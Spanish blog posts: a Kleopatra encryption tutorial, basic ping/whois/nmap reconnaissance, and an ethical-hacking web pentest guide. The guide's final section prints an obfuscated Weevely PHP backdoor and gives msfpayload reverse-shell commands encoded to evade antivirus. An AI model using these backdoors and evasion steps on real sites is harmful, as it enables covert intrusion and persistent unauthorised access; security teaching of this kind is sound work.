Tarea 3: Cifrar un fichero con Kleopatra – Gpg4win

12031986_180167425651878_6688136977114799334_n

  • Para descargar Gpg4win tenemos que ir a la dirección http://www.gpg4win.org/ y pulsar en el botón “Download Gpg4win” de color verde. Nos llevará a la página de descargas donde deberemos elegir la versión que queremos descargar.
  • Una vez instalado, tenemos que ejecutar la aplicación llamada “Kleopatra”, que se encontrará en el menú de aplicaciones, dentro del grupo llamado “Gpg4win”.
  • Una vez iniciada la aplicación vamos a ir a la  pestaña  de File / New certificate2015-09-28_12h19_09
  • luego daremos clic en la opción  «Create a personal  OpenPGP key pair» y luego  next2015-09-28_12h19_20
  • Ingresamos los datos básicos para crear dicho certificado: nombre y apellidos, dirección de correo electrónico y un comentario opcional.
    2015-09-28_12h19_39
  • Si pulsamos en el botón “Advanced Settings…”, podemos modificar algunos parámetros opcionales del certificado. Podemos elegir el tipo de clave a generar (RSA o DSA + ElGamal), la longitud de la clave (no se recomienda menos de 2048 bits actualmente), y el tipo de uso que haremos del certificado y la validez temporal del mismo
    2015-09-28_12h22_46
  • Una vez especificados los ajustes avanzados del certificado pulsamos en el botón “OK”, y cuando volvemos a la pantalla con los ajustes normales del certificado pulsamos sobre el botón “Next >”. Nos aparece la pantalla con el resumen de los ajustes:
    2015-09-28_12h19_48
  • Pulsamos sobre el botón “Create Key” para comenzar la generación de las claves del certificado en sí. Se nos pide que introduzcamos una contraseña para proteger la privacidad del certificado. Es importante introducir una contraseña robusta, puesto que cualquiera que descubra esta contraseña podrá utilizar nuestro certificado, y por tanto suplantar completamente nuestra identidad digital.
    2015-09-28_12h19_57
  • Una vez introducida la contraseña se generan las claves del certificado. Dependiendo de la velocidad de nuestro equipo y de la cantidad de actividad que tenga en ese momento le costará más o menos tiempo. Lo normal es que sean unos pocos segundos. Cuando termina se nos muestra una pantalla similar a la pantalla siguiente:
    2015-09-28_16h53_42
  • Una vez pulsado “OK” se nos devuelve a la pantalla anterior, y pulsando el botón “Finish” se termina el proceso de creación del certificado y volvemos a la pantalla inicial de la aplicación. Ahora se nos mostrará en la pestaña “My Certificates” el nuevo certificado recién creado:
    2015-09-27_21h11_22
  • Ya tenemos nuestro certificado, y esto nos permitirá cifrar ficheros para nosotros mismos (esto es, que sólo podamos descifrar nosotros). Pero será habitual que tengamos que cifrar ficheros para terceros. En este caso necesitaremos una copia de sus certificados. En concreto, de la parte pública de sus certificados (puesto que la privada nunca debe ser publicada).2015-09-29_06h06_28Se abre un cuadro de diálogo para escoger el fichero que contiene el certificado a importar, que deberá estar en uno de los formatos estándar para certificados OpenPGP o X.509. Una vez seleccionado el fichero, Kleopatra intentará importar el certificado. Si todo va bien, se nos muestra un cuadro de diálogo con un resumen de la operación.
    2015-09-29_06h08_13
  • Una vez tenemos importados los certificados de los usuarios para los que queremos cifrar un fichero, podemos llevar a cabo la operación de cifrado en sí. Para ello haremos uso de las extensiones del explorador de archivos que configura Kleopatra como parte de su instalación inicial.Vamos a la carpeta donde está el fichero que queremos cifrar. Pulsamos con el botón derecho sobre el fichero en cuestión y nos aparecerá un menú contextual similar al siguiente:2015-09-29_06h16_38
  • Escogemos “Firmar y cifrar” (la opción más interesante, ya que además de garantizar la confidencialidad con el cifrado, garantizamos la integridad del fichero con el firmado digital). En este caso se nos muestra una pantalla como la siguiente:2015-09-29_06h17_12
  • En este caso escogemos la opción (ya preseleccionada) “Sign and Encrypt (OpenPGP only)” y seleccionamos la casilla “Text output (ASCII armor)”, que guarda el fichero firmado y cifrado en un formato de texto ASCII (lo que hace que sea menos problemático para enviarlo por correo, por ejemplo).Pulsamos sobre el botón “Next >”.y en la siguiente pantalla se nos pide que indiquemos para qué usuario destinatario queremos cifrar el fichero. O dicho de otro modo, para que certificado queremos cifrar el fichero. Se nos muestra una lista de certificados disponibles. Si son muchos, podemos filtrarlos o bien usando la casilla “Find” (con un método de selección similar al indicado en la sección 3), o bien con el menú desplegable que está a la derecha de dicha casilla, donde podremos seleccionar diferentes subconjuntos de certificados.
  • Para escoger un certificado con el que cifrar el fichero, basta con seleccionarlo con el ratón y pulsar el botón “Add” de la zona intermedia. Nos quedaría como en la figura siguiente:
  • 2015-09-29_06h17_21
  • Una vez escogidos los certificados, pulsamos en el botón “Encrypt”. En este punto puede ocurrir que nos aparezca un cuadro de diálogo como el siguiente:2015-09-29_06h17_26
  • Si estamos seguros de que es lo que queremos, pulsamos el botón “Continue”. Sino pulsando el botón “Cancel” podemos volver a la pantalla anterior y añadir alguno de nuestros certificados a la lista de certificados destinatarios.
  • Si se introduce correctamente, se firma digitalmente el fichero con nuestro certificado y se cifra con el certificado o certificados destinarios y se nos muestra el resultado de la operación:
  • 2015-09-29_06h17_30
  • Ejemplo:
  • cifrado(1)

Tarea 1: Recoleccion de informacion mediante ping, whois, nmap

  • Hola a tod@s

Mostrare algunos ejemplos desde una máquina virtual de Kali 2.0

  • Ping herramienta que permite comprobar la disponibilidad de un host

Captura de pantalla de 2015-09-23 01:00:22

  • Whois herramienta que permite obtener información sobre un dominio

Captura de pantalla de 2015-09-23 21:16:17

  • Nmap esta herramienta que permite conocer puertos abiertos, sistemas operativos y aplicaciones que corren en un servidor o host

Captura de pantalla de 2015-09-24 00:17:09

[Penetration Testing – Hacking Etico] Análisis Web – Evaluación de Vulnerabilidades – Explotacion

INTRODUCCIÓN:
Hoy en día como muchos de nosotros tenemos conocimiento que en estos tiempos el Análisis de Aplicaciones Web juega un papel muy importante al hacer una Evaluación de la Seguridad y/o Penetration Testing, ya que esta nos brinda la información adecuada acerca de la aplicación web, como por ejemplo el tipo de Plugin que utiliza, tipos de CMS ya sea Joomla – WordPress u otros.
Esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades que se pueden presentar al momento de realizar las pruebas de penetración.
Para ello usaremos como es de costumbre en este Blog, BackTrack 5 R3, una distro de Linux basada en Ubuntu hecha perfectamente para llevar a cabo estas pruebas, ya que viene con un conjunto de herramientas muy importantes que servirá de mucho para obtener toda la información necesaria.

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB:
  • Network Mapping
  • CMS Identification
  • IDS/IPS Detection
  • Open Source Analysis
  • Web Crawlers
  • Vulnerability Assessment and Exploitation
  • Maintaining Access
NETWORK MAPPING:
Network Mapping es el estudio de la conectividad física de redes. Internet Mapping es el estudio de la conectividad física de la Internet. Network Mapping a menudo se trata de determinar los servidores y sistemas operativos se ejecutan en redes.
La ley y la ética de escaneo de puertos son complejas. Un análisis de la red puede ser detectada por los seres humanos o sistemas automatizados, y se trata como un acto malicioso.
En la suite de BackTrack se incluye NMAP, una herramienta que ya todos conocemos por su potencia y eficacia a la hora de utilizarla, la cual nos sirve de mucho para poder llevar a cabo este método tan importante en una Auditoria Web.
Nmap:
Nmap (“mapeador de redes”) es una herramienta de código abierto para exploración de red y auditoría de seguridad. Se diseñó para analizar rápidamente grandes redes, aunque funciona muy bien contra equipos individuales. Nmap utiliza paquetes IP «crudos» («raw», N. del T.) en formas originales para determinar qué equipos se encuentran disponibles en una red, qué servicios (nombre y versión de la aplicación) ofrecen, qué sistemas operativos (y sus versiones) ejecutan, qué tipo de filtros de paquetes o cortafuegos se están utilizando así como docenas de otras características.
Esta herramienta es muy usada por los Pentesters cuando realizan  Pruebas de Penetración.
Uso:
CMS IDENTIFICATION:
  • Blindelephant
  • CMS-explorer
  • Whatweb
BlindElephant:
BlindElephant es una herramienta basada en python que se utiliza para realizar Fingerprinting en Aplicaciones Web.
La herramienta es rápida, tiene poco ancho de banda y esta altamente automatizado.
Uso:
  • /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://site.com/ cms
CMS-Explorer:
Es otra herramienta basada en Perl que sirve para realizar Fingerprinting en Aplicaciones Web, como también puede ser usado para identificar el tipo de CMS utilizado, por tanto, se realiza el ataque de acuerdo con la información obtenida.
Uso:
  • /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://site.com/ -type cms
WhatWeb:
Es otra herramienta que se utiliza para identificar el tipo de sistemas de gestión contenidos (CMS), plataforma de blogs, estadísticas, bibliotecas javascript y servidores utilizados. Cuenta con 900 Plugins para fines de análisis web.
Uso:
IDS-IPS DETECTION:
Durante la realización de un VA/PT en un dominio, existe la posibilidad de que IDS-IPS esten instalados, esto aveces puede parar varios tipos de ataques realizados en el dominio.
Una gran cantidad de WAF se venden a las Empresas como una técnica valida para la mitigacion de vulnerabilidades en las Aplicaciones Web.
Por suerte, WAF es facil de detectar, porque la mayoría de estos utilizan la firma basada en métodos de detección, por lo tanto, el atacante puede tratar de codificar los parámetros de ataque y tratar de bypassear el WAF.
En la suite de BackTrack se incluyen dos herramientas útiles para la detección de los IDS-IPS, las cuales son:
  • Waffit
  • UA-Tester
Waffit:
Es una herramienta que detecta los posibles Firewall que pueda tener un servidor web, esto sirve de mucho ya que detectar el servidor de seguridad detrás del dominio es un paso muy importante en el proceso de Pruebas de Penetración.
Uso:
UA-Tester:
Esta herramienta esta diseñada para comprobar automáticamente si una URL especifica esta usando una lista Standar o No-Standar User-Agent proporcionada por el usuario (1 por linea).
Uso:
OPEN SOURCE ANALYSIS:
Open-Source Analysis se realiza utilizando herramientas como GHDB, revhosts, xssed y Maltego. El GHDB (Google Hack Data Base) y Xssed estan vinculadas a sitios webs, mientras que las dos otras son herramientas de consola.
GHDB:
Google Hacking Database, el equipo de exploit-db mantiene una base de datos para google dorks que pueden ayudar mucho a los Pen-testers en la recopilación de información. Podemos usar las dork’s para encontrar ciertos tipos de servidores vulnerables u otra información.
Por ejemplo, un dork Google como «Microsoft-IIS/6.0″ intitle:index.of » se puede utilizar para detectar el servidor que ejecuta Microsoft IIS 6.0.
Xssed:
Xssed.com es otro sitio web que contiene una lista de sitios web vulnerables a Cross Site Scripting, presentada por varios autores.
Se puede abrir desde: Applications – Backtrack – Information Gathering – Web Application Analysis – Open Source Analysis – Xssed.
Revhosts:
Revhosts es un proyecto pasivo escrito en Python que se utiliza para la recopilación de información (es decir, el Host, VirtualHost, entrada de DNS, directorios, dirección de correo, subred, etc.) Esta herramienta se encuentra tanto en la interfaz gráfica de usuario y la consola.

Se ubica en: Applications – BackTrack – Information Gathering – Web Application Analysis – Open Source Analysis – Revhosts.

WEB CRAWLERS:
En esta ultima categoría de Análisis Web, se utilizan los famosos Crawlers, esto ayudara mucho a enumerar los archivos «escondidos» dentro de un servidor web.
La suite de BackTrack cuenta con muchas herramientas para llevar a cabo este tipo de análisis  como son el Dirb, Golismero, SqlScan, Deblaze y WebShag.
WebShag tiene opciones como escaneo de puertos, recopilación de información básica, spider y fuzzing , se puede encontrar en: Applications – BackTrack – Information Gathering – Web Application Analysis – Web Crawlers – WebShag Gui.
 
 
 
 
VULNERABILITY ASSESSMENT AND EXPLOITATION:
 
La etapa de evaluación de la vulnerabilidad es donde se puede explorar nuestro objetivo en busca de errores, pero antes de hacer una evaluación de la vulnerabilidad, la recopilación de información sobre el objetivo es mucho más útil.
La fase de recopilación de información sigue siendo el paso clave antes de realizar nuevos ataques, simplemente porque hace el trabajo más fácil, por ejemplo, en la primera etapa: en el uso de escáners para identificar el CMScomo BlindElephant, se escaneo y se encontró la versión de la aplicación instalada.
Ahora, en la etapa de evaluación de la vulnerabilidad, se pueden utilizar muchas herramientas (escaners) que ayudaran mucho a encontrar respectivas vulnerabilidades en un servidor web especifico, como por ejemplo:
Joomscan:
Es una herramienta basada en Perl que se utiliza para identificar las vulnerabilidades mas conocidas como Sql Injection, XSS u otras, en los servidores web basados en la plataforma Joomla.
Uso:
SqlMap:
Sqlmap es una herramienta de código abierto que ayuda a automatizar el proceso de detectar y explotar las vulnerabilidades de inyección SQL permitiendo tener acceso total a la base de datos de los servidores web.
Uso:
Fimap:
Fimap es una pequeña herramienta programada en python que puede encontrar, preparar, auditar & explotar automáticamente los errores de Remote File Inclusion en aplicaciones web. Fimap debe ser algo como sqlmap pero sólo para LFI/RFI en lugar de la inyección de SQL. Esta actualmente bajo desarrollo, pero es utilizable. El objetivo de Fimap es mejorar la calidad y la seguridad de su sitio web.
Uso:
  • /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
  • /pentest/web/fimap# ./fimap.py -g -q ‘noticias.php?id=’
TheHarvester:
TheHarvester es una herramienta para recopilar cuentas de correo electrónico, nombres de usuario y nombres de host o subdominios de diferentes fuentes públicas como motores de búsqueda y los servidores de claves PGP.
Uso:
  • ./theharvester.py -d microsoft.com -l 500 -b google
  • ./theharvester.py -d microsoft.com -b pgp
  • ./theharvester.py -d microsoft -l 200 -b linkedin
Shodan:
Esto es otra herramienta de evaluación web, una utilidad particular para los pentesters. Puede ser utilizado para recoger una serie de información inteligente sobre los dispositivos que están conectados a la Internet. Podemos, por ejemplo, buscar para ver si todos los dispositivos de red, como routers, VoIP, impresoras, cámaras, etc están en su lugar. Para buscar si algún servicio se está ejecutando en el dominio, la sintaxis sería:
  • hostname:target.com port:80,21,22
Si deseamos simplemente conocer los resultados sobre el nombre de host, simplemente, la sintaxis seria:
  • hostname:target.com
W3af:
W3af es una herramienta de Auditoria de Seguridad para Aplicaciones Webs, se encuentra básicamente dividido en varios módulos como el Ataque, Auditoria, Exploit, Descubrimiento, Evasion y Brute Force, lo cual se pueden usar todos en consecuencia.
Estos módulos en W3af viene con varios módulos secundarios como, por ejemplo, podemos seleccionar la opción XSS en el módulo de Auditoria  suponiendo que es necesario para realizar una determinada Auditoria.
Se ubica en: Applications – BackTrack – Vulnerability Assessment – Web Application Assessment – Web Vulnerability Scanners – w3af
Una vez completado el análisis, w3af muestra información detallada acerca de las vulnerabilidades encontradas en el sitio web especificado, que se puede comprometer en consecuencia de una explotación adicional.
Una vez que la vulnerabilidad es encontrada, podemos configurar los plugins en el modulo «Exploit» y realizar nuevos ataques, que nos pueden ayudar a obtener una WebShell en el sitio objetivo. Otra ventaja importante de w3af es que también viene con MSF para tomar el ataque al siguiente nivel.
Uniscan:
Uniscan es un escáner de vulnerabilidades Web, dirigido a la seguridad informática, cuyo objetivo es la búsqueda de vulnerabilidades en los sistemas web. Está licenciado bajo GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
Uniscan está desarrollado en Perl, tiene un fácil manejo de expresiones regulares y también es multi-threaded.
Se puede descargar desde el siguiente link: Download Uniscan Web Vulnerability Scanner v6.2
Uso:
Nikto:
Nikto es un escáner de servidor web que realiza pruebas completas contra los servidores web para varios artículos, incluyendo más de 6500 archivos/CGIs potencialmente peligrosos, los controles de versiones no actualizadas de más de 1250 servidores, y los problemas específicos de la versión de más de 270 servidores. También comprueba los elementos de configuración del servidor, tales como la presencia de múltiples archivos de índice y opciones de servidor HTTP.
Se ubica en: Applications – BackTrack – Vulnerability Assessment – Web Application Assessment – Web Vulnerability Scanners – Nikto
 
Uso:
  • /pentest/web/nikto# ./nikto.pl -host ww.site.com
MAINTAINING ACCESS:
Una vez que tengamos acceso a la página web (objetivo), tenemos que mantener el acceso para su uso futuro, porque no queremos estar empezando desde cero una y otra vez. Con el fin de evitar esto, podemos cargar las shell’s web o puertas traseras a la página web.
La codificación de la puerta trasera también es importante, ya que no debe crear «ruido» una vez cargado en el servidor. Si es así, entonces los administradores pueden fácilmente detectar y eliminar las puertas traseras.
En la suite de BackTrack 5r3 se incorporan buenas herramientas para llevar a cabo este proceso, las cuales son los siguientes:
Weevely:
Weevely es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como puerta trasera o como una shell web para gestionar las cuentas web. Weevely busca funciones como system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando las funciones activadas en una servidor remoto. El código siguiente es un ejemplo del código de la puerta trasera creada por Weevely.
————————————————————————
eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’));
————————————————————————
Se ubica en: Applications – BackTrack – Maintaining Access – Web BackDoors – Weevely
Uso:
  • /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php (creara el backdoor)
MsfPayload:
Metasploit se puede utilizar para crear puertas traseras que luego pueden ser utilizados para mantener el acceso en el servidor web. Esto se puede hacer con la ayuda de msfpayload.
Los pasos para crear puerta trasera en msfpayload son como sigue:
Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell Meterpreter generado a través de una conexión TCP inverso. El comando sería:
  • msfpayload windows/meterpreter/reverse_tcp
Esta Payload tiene dos parámetros: LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar. La «R» se utiliza para dar al archivo de salida en formato de datos RAW para que podamos codificar posteriormente.
  • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical («|»)
  • windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe 
-e se usa para especificar el tipo de codificación necesario, en este caso estoy usando la codificación shikata_ga_nai y -t para el tipo de extension del archivo (exe).
Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF, usamos el siguiente comando:
  • msfpayload windows/meterpreter/reverse_tcp -l
CONCLUSIÓN:
Estos son sólo unos pocos métodos que se pueden seguir para realizar la explotación de las vulnerabilidades en una aplicación web. Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar una evaluación de la vulnerabilidad con el fin de obtener información sobre los exploits que se pueden utilizar. Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la detección.
Espero que esto te ayude a encontrar la vulnerabilidad, la explotación y la forma de mantener el acceso a tu objetivo.
Saludos y hasta la próxima 😉